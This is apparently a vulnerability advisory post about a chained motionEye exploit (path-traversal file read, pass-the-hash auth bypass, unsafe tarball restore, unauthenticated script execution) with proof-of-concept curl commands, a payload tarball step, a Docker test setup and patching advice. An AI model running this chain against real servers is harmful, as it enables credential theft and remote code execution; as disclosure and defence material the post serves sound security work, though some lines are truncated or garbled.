Listen to this Post
How the Mentioned CVEs Work
The motionEye platform (up to version 0.43.1b4) is vulnerable to a critical multi-stage exploit chain that can lead to unauthenticated Remote Code Execution (RCE). This chain leverages a combination of four distinct vulnerabilities that, when linked together, allow an attacker to completely compromise the server.
The chain begins with a Local File Inclusion (LFI) vulnerability, identified as CVE-2026-31978. The `get_media_preview()` function in `mediafiles.py` fails to sanitize `..` sequences in the filename parameter. An attacker can exploit this by sending a request to `/picture/{id}/preview/..%2F..%2Fetc%2Fpasswd` to read arbitrary files from the server. The `%2F` encoding is crucial, as the Tornado web server does not normalize these characters before passing them to os.path.join(). This LFI is used to read the configuration file (/etc/motioneye/motion.conf), which contains the SHA1 hash of the admin password.
With the admin password hash in hand, the attacker moves to the second stage: a pass-the-hash authentication bypass. motionEye’s signature-based authentication, as implemented in `get_current_user()` in base.py, accepts signatures computed using the password hash as the key. The attacker can compute a valid HMAC-style signature for any request using the stolen hash, thereby gaining administrative access to the API without needing the plaintext password.
The third stage involves an unsafe configuration restore function. The `restore()` function in `config.py` extracts a user-supplied tarball into the `CONF_PATH` using `tar zxC` without sanitizing the archive entries. An attacker can craft a malicious tarball containing an executable file (e.g., lock_<id>) that will be written to the CONF_PATH.
Finally, the attacker triggers the execution of the uploaded file. The `post()` method in `action.py` has no authentication decorator and executes scripts found in `CONF_PATH` with subprocess.Popen. By sending a POST request to /action/<id>/lock, the server executes the attacker-controlled `lock_
DailyCVE Form:
Platform: motionEye
Version: <= 0.43.1b4
Vulnerability: LFI, Auth Bypass, Unsafe Restore, Unauth Action
Severity: Critical
Date: 2025-09-26
Prediction: 2026-07-15
What Undercode Say: Analytics
Affected Code & Attack Vectors
- LFI (CVE-2026-31978): `motioneye/motioneye/mediafiles.py` → `get_media_preview()` lacks `..` checks.
- Pass-the-Hash: `motioneye/motioneye/handlers/base.py` → `get_current_user()` accepts hash-based signatures.
- Unsafe Restore: `motioneye/motioneye/config.py` → `restore()` uses unsanitized
tar -zxC. - Unauth Action: `motioneye/motioneye/handlers/action.py` → `post()` missing authentication decorator.
Proof of Concept (PoC) Commands
Start the vulnerable container:
docker run -d --name motioneye -p 9999:8765 ghcr.io/motioneye-project/motioneye:edge
Verify the version:
docker logs motioneye | grep "motionEye server"
Output: `motionEye server 0.43.1b4`
Exploit Chain Commands
- LFI: Read the admin password hash from the config file.
curl --path-as-is "http://TARGET:8765/picture/1/download/%2Fetc%2Fmotioneye%2Fmotion.conf"
Extract the `@admin_password ` from the output.
- Pass-the-Hash: Generate a valid signature using the stolen hash.
import hashlib ... (use the compute_signature function from the advisory) ...
- Malicious Tar: Create a tarball with an executable action script.
echo '!/bin/bash\ntouch /tmp/meye_rce_ok' > lock_1 tar -czf payload.tar.gz lock_1
4. Trigger RCE: Upload and execute the payload.
Upload the tarball via the restore endpoint with the generated signature curl -X POST "http://TARGET:8765/config/restore?_username=admin&_signature=<SIG>" -F "[email protected]" Trigger the action curl -X POST "http://TARGET:8765/action/1/lock"
Verification
docker exec -it motioneye ls -la /tmp | grep meye_rce_ok
Output: `-rw-r–r– 1 root root 0 … /tmp/meye_rce_ok`
Exploit:
The exploit is a multi-stage process that chains an LFI, an authentication bypass, an unsafe file write, and an unauthenticated action execution to achieve RCE. An attacker can start by reading the admin password hash via the LFI, then use that hash to compute valid authentication signatures. With admin access, they upload a malicious tarball that writes an executable file to the server. Finally, they trigger the unauthenticated action endpoint to execute the file, gaining full control over the motionEye container.
Protection:
- Upgrade: Update motionEye to a patched version (if available) or apply the fixes from the official repository.
- Block Absolute Paths: In `get_media_content()` and
get_media_path(), reject absolute paths and `..` sequences. - Fix Authentication: Remove hash-based signature acceptance; only accept signatures computed with the plaintext password.
- Harden Restore: Sanitize tarball entries to reject absolute paths,
.., symlinks, and non-regular files. - Require Auth: Add an authentication decorator (admin-only) to the
ActionHandler.
Impact:
- Unauthenticated RCE: If the normal user password is unset, the entire chain can be executed without any credentials.
- Authenticated RCE: Even with a normal user password, an attacker with normal credentials can escalate to admin and achieve RCE.
- Arbitrary File Read: The LFI vulnerability allows reading any file on the server filesystem.
- Full Compromise: Successful exploitation leads to full compromise of the motionEye process account, the container, and potentially the host environment.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
